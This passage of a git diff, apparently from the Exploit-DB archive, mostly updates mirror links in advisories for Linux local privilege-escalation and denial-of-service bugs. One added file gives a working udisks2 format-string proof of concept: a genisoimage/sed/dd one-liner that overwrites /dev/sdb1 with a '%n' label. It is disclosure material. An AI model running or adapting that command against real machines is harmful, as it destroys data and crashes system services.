-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43322.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/43322.zip \ No newline at end of file diff --git a/exploits/linux/dos/44254.py b/exploits/linux/dos/44254.py index 810ff63e3..c0fb5c77d 100755 --- a/exploits/linux/dos/44254.py +++ b/exploits/linux/dos/44254.py @@ -1,5 +1,5 @@ # Written by Alex Conrey -# Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44254.zip +# Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44254.zip # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by diff --git a/exploits/linux/dos/44265.py b/exploits/linux/dos/44265.py index a9163efb6..97039bd8e 100755 --- a/exploits/linux/dos/44265.py +++ b/exploits/linux/dos/44265.py @@ -1,6 +1,6 @@ #-- coding: utf8 -- #!/usr/bin/python -# Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44265.zip +# Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44265.zip import sys, os, time, shodan from pathlib import Path diff --git a/exploits/linux/dos/44490.txt b/exploits/linux/dos/44490.txt index 3599abc0c..cae516a44 100644 --- a/exploits/linux/dos/44490.txt +++ b/exploits/linux/dos/44490.txt @@ -65,4 +65,4 @@ pdfunite version 0.41.0 Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44490.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44490.zip \ No newline at end of file diff --git a/exploits/linux/dos/44519.txt b/exploits/linux/dos/44519.txt index 8cbff039e..ef7a096af 100644 --- a/exploits/linux/dos/44519.txt +++ b/exploits/linux/dos/44519.txt @@ -88,4 +88,4 @@ https://github.com/0xshyam/hamm3r.py Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44519.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44519.zip \ No newline at end of file diff --git a/exploits/linux/dos/45268.txt b/exploits/linux/dos/45268.txt index 9dcb3d80a..343004728 100644 --- a/exploits/linux/dos/45268.txt +++ b/exploits/linux/dos/45268.txt @@ -6,4 +6,4 @@ This issue reproduces on Chrome and Firefox for Linux. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45268.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45268.zip \ No newline at end of file diff --git a/exploits/linux/dos/45450.txt b/exploits/linux/dos/45450.txt new file mode 100644 index 000000000..37c679ecb --- /dev/null +++ b/exploits/linux/dos/45450.txt @@ -0,0 +1,39 @@ +# Exploit: udisks2 2.8.0 - Denial of Service (PoC) +# Author: oxagast +# Date: 2018-09-22 +# Vendor Homepage: http://storaged.org/ +# Software Link: https://github.com/storaged-project/udisks +# Version: <=udisks2 2.8.0 +# Tested on: Ubuntu x64 + __ _ _ __ ___ __ ____ ____ + / ( \/ )/ _\ / __)/ _\/ ___(_ _) + ( O ) (/ ( (_ / \___ \ )( + \__(_/\_\_/\_/\___\_/\_(____/(__) + +# ========The vulnerable section of code is:======== +#if GLIB_CHECK_VERSION(2, 50, 0) + g_log_structured ("udisks", (GLogLevelFlags) level, + "MESSAGE", message, "THREAD_ID", "%d", (gint) syscall (SYS_gettid), + "CODE_FUNC", function, "CODE_FILE", location); +#else + g_log ("udisks", level, "[%d]: %s [%s, %s()]", (gint) syscall (SYS_gettid), message, location, function); + +# =================Short Whitepaper================= +# The vulnerability can be triggered by using one computer to create a filesystem on a USB key +# (or other removable media), then editing it's filesystem label to include a bunch of %n's, removing and +# inserting the media into another computer running udisks2 <=2.8.0. This binary runs as root, and if +# exploited in that capacity could potentially allow full compromise. This will cause a denial of service, +# crashing udisks2 and not letting it restart (or until /var/lib/udisks2/mounted-fs is +# removed and the system is restarted). This keeps the system from automounting things like USB drives and CDs. +# The vulnerability -may- be exploitable beyond a DoS by crafting a format string exploit and putting it +# in the label of the drive. I tried to exploit it for a couple days, but cannot find a filesystem with a +# lengthy enough label to be able to fit the exploit and spawn a root shell, as the smallest shellcode I +# could make was around 50 characters, and the longest filesystem labels I could find are limited to 32 characters. + +# =============Proof of Concept Code================ +# This code will destroy any information on /dev/sdb1!!!! Change that to where you have your USB media. +# PoC source code: + +genisoimage -V "AAAAAAAA" -o dos.iso /etc/passwd && dd if=dos.iso | sed -e 's/AAAAAAAA/%n%n%n%n/g' | dd of=/dev/sdb1 + +# Now remove and reinsert the media and wait for the crash report. \ No newline at end of file diff --git a/exploits/linux/local/1596.txt b/exploits/linux/local/1596.txt index 3bb00a2c9..c769c9cea 100644 --- a/exploits/linux/local/1596.txt +++ b/exploits/linux/local/1596.txt @@ -24,6 +24,6 @@ X Protocol Version 11, Revision 0, Release 7.0 r00t # id uid=0(root) gid=100(users) groups=10(wheel),18(audio)... -# backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/1596.tgz (xmodulepath.tgz) +# backup: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1596.tgz (xmodulepath.tgz) # milw0rm.com [2006-03-20] \ No newline at end of file diff --git a/exploits/linux/local/1831.txt b/exploits/linux/local/1831.txt index 6ad8af54f..815ad6f42 100644 --- a/exploits/linux/local/1831.txt +++ b/exploits/linux/local/1831.txt @@ -9,7 +9,7 @@ that data is overwritten again correctly by a program' function). .bss section is in higher addresses than .dtors section, so, we can't hijack .dtors to.... -PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/1831.tar.gz (05262006-tiffspl33t.tar.gz) +PoC: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/1831.tar.gz (05262006-tiffspl33t.tar.gz) nitr0us diff --git a/exploits/linux/local/19803.txt b/exploits/linux/local/19803.txt index 4bd3063b4..4a23fa132 100644 --- a/exploits/linux/local/19803.txt +++ b/exploits/linux/local/19803.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1047/info wmcdplay is cdplayer generally used with the WindowMaker X11 window-manager on unix systems. While wmcdplay is rarely installed at all by default, when it is installed it is typically set setuid root. wmcdplay is vulnerable to a buffer overflow attack due to lack of bounds checking on an argument it is passed. As a result, a local user can elevate their priviliges to root through overruning the stack and executing arbitrary code with the effective user-id of the process (root). -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19803.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19803.tar.gz \ No newline at end of file diff --git a/exploits/linux/local/19813.txt b/exploits/linux/local/19813.txt index a9eacbd59..6df9dc59b 100644 --- a/exploits/linux/local/19813.txt +++ b/exploits/linux/local/19813.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1061/info A vulnerability exists in the kreatecd program for Linux. This program is a graphical front end to the cdrecord program, and is installed setuid root. This program will blindly trust the configuration of the path to cdrecord, as specified by the user. This means that arbitrary programs can be executed as root by an attacker using kreatecd. It appears that graphical interaction is required to exploit this program. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19813.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19813.tar.gz \ No newline at end of file diff --git a/exploits/linux/local/19915.txt b/exploits/linux/local/19915.txt index 79d292ce4..c567cabdf 100644 --- a/exploits/linux/local/19915.txt +++ b/exploits/linux/local/19915.txt @@ -4,4 +4,4 @@ Some linux distributions (S.u.S.E. 6.4 reported) ship with kscd (a CD player for Red Hat, Linux Mandrake, and Turbo Linux do not currently ship with kscd setgid 'disk'. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19915.tgz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/19915.tgz \ No newline at end of file diff --git a/exploits/linux/local/20843.txt b/exploits/linux/local/20843.txt index a0a3a8b33..da18d2d3c 100644 --- a/exploits/linux/local/20843.txt +++ b/exploits/linux/local/20843.txt @@ -4,4 +4,4 @@ A heap overflow vulnerability exists in the 'man' system manual pager program. The vulnerability exists due to a length check error when the -S option is given. As a result, it may be possible for a local user to execute arbitrary code with group 'man' privileges. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20843.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20843.tar.gz \ No newline at end of file diff --git a/exploits/linux/local/20926.txt b/exploits/linux/local/20926.txt index c8ac907fd..393fce5a9 100644 --- a/exploits/linux/local/20926.txt +++ b/exploits/linux/local/20926.txt @@ -6,4 +6,4 @@ The vulnerability exists due to the way the program handles manual page files be As a result, it may be possible for local users to execute arbitrary code with group 'man' privileges. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20926.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/20926.tar.gz \ No newline at end of file diff --git a/exploits/linux/local/21062.txt b/exploits/linux/local/21062.txt index 433fbb88c..2e76eb1b7 100644 --- a/exploits/linux/local/21062.txt +++ b/exploits/linux/local/21062.txt @@ -6,4 +6,4 @@ The problem is the result of the use of signed integers in the program's tTflag( Because the '-d' command-line switch is processed before the program drops its elevated privileges, this could lead to a full system compromise. This vulnerability has been successfully exploited in a laboratory environment. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21062.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21062.tar.gz \ No newline at end of file diff --git a/exploits/linux/local/21063.txt b/exploits/linux/local/21063.txt index 9b70d099f..c5fc9e667 100644 --- a/exploits/linux/local/21063.txt +++ b/exploits/linux/local/21063.txt @@ -6,4 +6,4 @@ The problem is the result of the use of signed integers in the program's tTflag( Because the '-d' command-line switch is processed before the program drops its elevated privileges, this could lead to a full system compromise. This vulnerability has been successfully exploited in a laboratory environment. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21063.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21063.tar.gz \ No newline at end of file diff --git a/exploits/linux/local/21124.txt b/exploits/linux/local/21124.txt index 438afddd4..18cac4047 100644 --- a/exploits/linux/local/21124.txt +++ b/exploits/linux/local/21124.txt @@ -6,4 +6,4 @@ Attackers can exploit this to elevate privileges. Note: There are currently conflicting reports about the exploitability of this vulnerability. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21124.tgz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21124.tgz \ No newline at end of file diff --git a/exploits/linux/local/21229.txt b/exploits/linux/local/21229.txt index e8e06ca23..7997a24e2 100644 --- a/exploits/linux/local/21229.txt +++ b/exploits/linux/local/21229.txt @@ -4,4 +4,4 @@ at is a freely available, open source scheduler package. It is included with var Under some circumstances, at does not correctly handle time input. A local user attempting to schedule a task via commandline execution and using a maliciously crafted time format can cause heap corruption in at. As the at program is installed setuid root in most implementations, this could result in the execution of arbitrary code with administrative privileges. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21229.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21229.tar.gz \ No newline at end of file diff --git a/exploits/linux/local/21248.txt b/exploits/linux/local/21248.txt index 7e0506542..2d4d93ef0 100644 --- a/exploits/linux/local/21248.txt +++ b/exploits/linux/local/21248.txt @@ -6,4 +6,4 @@ UML does not correctly protect kernel address space from user programs within th This is a known problem with the current UML implementation. Memory protection may be partially implemented at this time. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21248.tgz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21248.tgz \ No newline at end of file diff --git a/exploits/linux/local/21375.txt b/exploits/linux/local/21375.txt index 4e247b67b..559ae3a62 100644 --- a/exploits/linux/local/21375.txt +++ b/exploits/linux/local/21375.txt @@ -4,4 +4,4 @@ The Internet Software Consortium (ISC) Internet News (INN) project is a powerful Multiple vulnerabilities have been reported in two components of INN, inews and rnews. Reportedly, both are vulnerable to locally exploitable format string problems. Under some systems these binaries may be installed suid root or sgid news, allowing a local attacker to gain elevated privileges. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21375.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21375.tar.gz \ No newline at end of file diff --git a/exploits/linux/local/21458.txt b/exploits/linux/local/21458.txt index b34fc0871..ae3a30157 100644 --- a/exploits/linux/local/21458.txt +++ b/exploits/linux/local/21458.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/4762/info An attacker with root access may be able to write to kernel memory in spite of the security patch provided by grsecurity. The patch operates by redirecting the write() system call, when it is being used to write to a memory device. Unfortunately, there are other methods that can be used to write to kernel memory (such as mapping the device to memory using mmap()). -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21458.tgz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21458.tgz \ No newline at end of file diff --git a/exploits/linux/local/21763.txt b/exploits/linux/local/21763.txt index 928281b2e..248a33315 100644 --- a/exploits/linux/local/21763.txt +++ b/exploits/linux/local/21763.txt @@ -4,4 +4,4 @@ Linuxconf is a Linux configuration utility from Solucorp. It is typically instal A buffer overflow vulnerability has been reported for Linuxconf. The vulnerability is due to insufficent bounds checking of the LINUXCONF_LANG environment variable. An attacker who sets the LINUXCONF_LANG environment variable with an overly large string will be able to cause the buffer overflow condition. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21763.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/21763.tar.gz \ No newline at end of file diff --git a/exploits/linux/local/22189.txt b/exploits/linux/local/22189.txt index 79f577b2d..0a705a4c4 100644 --- a/exploits/linux/local/22189.txt +++ b/exploits/linux/local/22189.txt @@ -4,4 +4,4 @@ mtink is prone to a locally exploitable buffer overflow condition. This is due t mtink is reportedly installed setgid 'sys' on Mandrake Linux, so it is possible that this issue may be exploited to execute arbitrary code with elevated privileges. Other distributions may also be affected if mtink is installed or runs with elevated privileges. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/22189.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22189.tar.gz \ No newline at end of file diff --git a/exploits/linux/local/22190.txt b/exploits/linux/local/22190.txt index 1a60427d4..f94a29a07 100644 --- a/exploits/linux/local/22190.txt +++ b/exploits/linux/local/22190.txt @@ -4,4 +4,4 @@ It has been reported that a buffer overflow in escputil exists. When supplied wi escputil is reportedly installed setgid 'sys' on Mandrake Linux, so it is possible that this issue may be exploited to execute arbitrary code with elevated privileges. Other distributions may also be affected if the utility is installed or runs with elevated privileges. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/22190.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22190.tar.gz \ No newline at end of file diff --git a/exploits/linux/local/25707.txt b/exploits/linux/local/25707.txt index f7bd0d758..3e14ee8ef 100644 --- a/exploits/linux/local/25707.txt +++ b/exploits/linux/local/25707.txt @@ -4,4 +4,4 @@ Both cryptoloop and dm-crypt are reported prone to an information disclosure vul It should be noted that a successful attack would reveal the presence of a watermarked file but not the file contents. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25707.tar.bz2 \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25707.tar.bz2 \ No newline at end of file diff --git a/exploits/linux/local/29714.txt b/exploits/linux/local/29714.txt index 2d324bc44..605b5436a 100644 --- a/exploits/linux/local/29714.txt +++ b/exploits/linux/local/29714.txt @@ -30,4 +30,4 @@ to exploit this bug silently. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/29714.tgz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29714.tgz \ No newline at end of file diff --git a/exploits/linux/local/31911.txt b/exploits/linux/local/31911.txt index ecb83bb92..d0d9670db 100644 --- a/exploits/linux/local/31911.txt +++ b/exploits/linux/local/31911.txt @@ -6,6 +6,6 @@ Successfully exploiting these issues can allow an attacker to execute arbitrary Vim 7.1.298 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31911-1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31911-2.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31911-3.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31911-1.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31911-2.zip +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31911-3.zip \ No newline at end of file diff --git a/exploits/linux/local/33395.txt b/exploits/linux/local/33395.txt index 824d2a288..13c8c27ce 100644 --- a/exploits/linux/local/33395.txt +++ b/exploits/linux/local/33395.txt @@ -6,4 +6,4 @@ Exploits may allow attackers to execute arbitrary code with kernel-level privile Successful exploits will result in the complete compromise of affected computers. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33395.tgz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33395.tgz \ No newline at end of file diff --git a/exploits/linux/local/34421.c b/exploits/linux/local/34421.c index 8101bbd34..a97b8dfab 100644 --- a/exploits/linux/local/34421.c +++ b/exploits/linux/local/34421.c @@ -1,5 +1,5 @@ // -// Full Exploit: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34421.tar.gz (CVE-2014-5119.tar.gz) +// Full Exploit: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34421.tar.gz (CVE-2014-5119.tar.gz) // // // --------------------------------------------------- diff --git a/exploits/linux/local/34537.txt b/exploits/linux/local/34537.txt index 04b4f7d4a..3fa321528 100644 --- a/exploits/linux/local/34537.txt +++ b/exploits/linux/local/34537.txt @@ -6,4 +6,4 @@ Three flaws have been identified that contribute to a weakening of the protectio Attackers may leverage these weaknesses to attack encrypted files through watermarking or other techniques. Successful attacks may disclose sensitive information. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34537.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34537.tar.gz \ No newline at end of file diff --git a/exploits/linux/local/35749.txt b/exploits/linux/local/35749.txt index 288edda95..628d36ddd 100644 --- a/exploits/linux/local/35749.txt +++ b/exploits/linux/local/35749.txt @@ -10,7 +10,7 @@ but disabling it is a matter of running setenforce 0 as root. Download: https://mega.co.nz/#!jgBT0RxZ!LQDEBBrbGxE6fag4d_A2C2cWj2PSNR_ZvnSW_UjRD5E -Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/35749.rpm (redstarroot.rpm) +Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35749.rpm (redstarroot.rpm) ## Source: http://richardg867.wordpress.com/2015/01/01/notes-on-red-star-os-3-0/ & http://www.openwall.com/lists/oss-security/2015/01/09/1 \ No newline at end of file diff --git a/exploits/linux/local/37168.txt b/exploits/linux/local/37168.txt index d02f90e8f..1584aafcd 100644 --- a/exploits/linux/local/37168.txt +++ b/exploits/linux/local/37168.txt @@ -9,6 +9,6 @@ # CVE : N/A Source: https://github.com/mdsecresearch/Publications/blob/master/exploits/rainbowdash.tgz?raw=true -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37168.tgz +Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37168.tgz Blog post for more detail: http://blog.mdsec.co.uk/2015/05/my-lulzy-pwniez-abusing-kernel-elf.html \ No newline at end of file diff --git a/exploits/linux/local/3730.txt b/exploits/linux/local/3730.txt index 173973310..c91ceef9e 100644 --- a/exploits/linux/local/3730.txt +++ b/exploits/linux/local/3730.txt @@ -1,5 +1,5 @@ ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield) -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/3730.tgz (04132007-pr0ftpd_modctrls.tgz) +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3730.tgz (04132007-pr0ftpd_modctrls.tgz) # milw0rm.com [2007-04-13] \ No newline at end of file diff --git a/exploits/linux/local/38353.txt b/exploits/linux/local/38353.txt index 31138a7bc..1b8dc5d21 100644 --- a/exploits/linux/local/38353.txt +++ b/exploits/linux/local/38353.txt @@ -10,4 +10,4 @@ open("/var/crash/vmcore.log", O_RDONLY|O_LARGEFILE|O_CLOEXEC) = 31 Thus the output file is opened unconditionally and without O_EXCL or O_NOFOLLOW. Also opening of input file does not care about links. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38353.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38353.zip \ No newline at end of file diff --git a/exploits/linux/local/39771.txt b/exploits/linux/local/39771.txt index 14efa2b87..e99d8c276 100644 --- a/exploits/linux/local/39771.txt +++ b/exploits/linux/local/39771.txt @@ -91,4 +91,4 @@ Fixed in https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit? Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39771.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39771.zip \ No newline at end of file diff --git a/exploits/linux/local/39772.txt b/exploits/linux/local/39772.txt index b6b92d924..340110452 100644 --- a/exploits/linux/local/39772.txt +++ b/exploits/linux/local/39772.txt @@ -125,4 +125,4 @@ Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id= Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552 -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip \ No newline at end of file +Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip \ No newline at end of file diff --git a/exploits/linux/local/39992.md b/exploits/linux/local/39992.md index 522e6652f..493cac3df 100644 --- a/exploits/linux/local/39992.md +++ b/exploits/linux/local/39992.md @@ -213,4 +213,4 @@ The page spraying is pretty primitive and racy; while it works reliably for me, Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39992.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39992.zip \ No newline at end of file diff --git a/exploits/linux/local/40270.txt b/exploits/linux/local/40270.txt index bf181c243..aefc37832 100644 --- a/exploits/linux/local/40270.txt +++ b/exploits/linux/local/40270.txt @@ -5,4 +5,4 @@ Full Exploit: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40270.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40270.zip \ No newline at end of file diff --git a/exploits/linux/local/40489.txt b/exploits/linux/local/40489.txt index a87502de2..55c935cc6 100644 --- a/exploits/linux/local/40489.txt +++ b/exploits/linux/local/40489.txt @@ -39,4 +39,4 @@ root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40489.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40489.zip \ No newline at end of file diff --git a/exploits/linux/local/40936.html b/exploits/linux/local/40936.html index 7b602db09..0ec8a1e10 100644 --- a/exploits/linux/local/40936.html +++ b/exploits/linux/local/40936.html @@ -1,6 +1,6 @@ diff --git a/exploits/linux/local/40937.txt b/exploits/linux/local/40937.txt index 77259c73d..9634af94c 100644 --- a/exploits/linux/local/40937.txt +++ b/exploits/linux/local/40937.txt @@ -13,4 +13,4 @@ Source: https://donncha.is/2016/12/compromising-ubuntu-desktop/ Download: https://github.com/DonnchaC/ubuntu-apport-exploitation/archive/6ecfdf798f39fdd49b5929240d90a876c1e97ebb.zip -Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40937.zip \ No newline at end of file +Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40937.zip \ No newline at end of file diff --git a/exploits/linux/local/40943.txt b/exploits/linux/local/40943.txt index 5a1fd12c0..662e734e3 100644 --- a/exploits/linux/local/40943.txt +++ b/exploits/linux/local/40943.txt @@ -22,14 +22,14 @@ Today, the demos are videos instead of images. This first video shows a full, re Exploit file: gnome_calc_fedora_25_libc_2.24-3.spc (rename it to .flac to get it to work as in the video). - Download: https://security.appspot.com/security/spc/gnome_calc_fedora_25_libc_2.24-3.spc -- Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40943-1.flac +- Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40943-1.flac And this second video shows a couple of different exploitation contexts in Ubuntu 16.04 LTS, using the same exploit file for each. Again, this is showcasing the reliability that the underlying vulnerability permits. The different exploited processes (gnome-video-thumbnailer and totem) have very different heap and threading setups: - https://www.youtube.com/watch?v=wrCLoem6ggM Exploit file: xcalc_ubuntu_16.04_libc_2.23-0ubuntu3.spc (rename it to .mp3 to get it to work as in the video). - Download: https://security.appspot.com/security/spc/xcalc_ubuntu_16.04_libc_2.23-0ubuntu3.spc -- Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40943-2.mp3 +- Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40943-2.mp3 Impact is mixed. On Ubuntu, the faulty code is installed and on the attack surface by default, if you select the “mp3” option during install -- which I certainly always do. On Fedora, there’s a very sensible decision to split gstreamer1-plugins-bad into multiple packages, with only gstreamer1-plugins-bad-free installed by default. This limits the attack surface and does not include Game Music Emu. Of course, the gstreamer framework will happily offer to install gstreamer1-plugins-bad-free-extras, with a very nice UI, if the victim simply tries to open the relevant media file. diff --git a/exploits/linux/local/40962.txt b/exploits/linux/local/40962.txt index 9d6d77430..9d8f1161b 100644 --- a/exploits/linux/local/40962.txt +++ b/exploits/linux/local/40962.txt @@ -23,4 +23,4 @@ yields a root shell. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40962.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40962.zip \ No newline at end of file diff --git a/exploits/linux/local/41356.txt b/exploits/linux/local/41356.txt index aec59ebaa..a32af26c0 100644 --- a/exploits/linux/local/41356.txt +++ b/exploits/linux/local/41356.txt @@ -63,4 +63,4 @@ CPU cores. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41356.zip \ No newline at end of file diff --git a/exploits/linux/local/41597.txt b/exploits/linux/local/41597.txt index c176de39c..4ffbcb002 100644 --- a/exploits/linux/local/41597.txt +++ b/exploits/linux/local/41597.txt @@ -52,4 +52,4 @@ away from the filesystem root. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41597.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41597.zip \ No newline at end of file diff --git a/exploits/linux/local/41973.txt b/exploits/linux/local/41973.txt index 83ab5b3fa..7a591a6bf 100644 --- a/exploits/linux/local/41973.txt +++ b/exploits/linux/local/41973.txt @@ -141,4 +141,4 @@ PoC Filename: xen_ptuaf_hv_shellcode_exec.tar Proofs of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41973.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41973.zip \ No newline at end of file diff --git a/exploits/linux/local/42611.txt b/exploits/linux/local/42611.txt index dbbad848b..df08a2540 100644 --- a/exploits/linux/local/42611.txt +++ b/exploits/linux/local/42611.txt @@ -27,4 +27,4 @@ For how to create the malicious gems, see the attached file src.tar.gz. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/42611.zip \ No newline at end of file +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42611.zip \ No newline at end of file diff --git a/exploits/linux/local/44204.md b/exploits/linux/local/44204.md index f320bdbb2..57d12e20a 100644 --- a/exploits/linux/local/44204.md +++ b/exploits/linux/local/44204.md @@ -41,4 +41,4 @@ Liang Chen, WEBKIT EVERYWHERE: SECURE OR NOT? [BHEU14] (https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF) -Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44204.zip \ No newline at end of file +Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/44204.zip \ No newline at end of file diff --git a/exploits/linux/local/44205.md b/exploits/linux/local/44205.md index 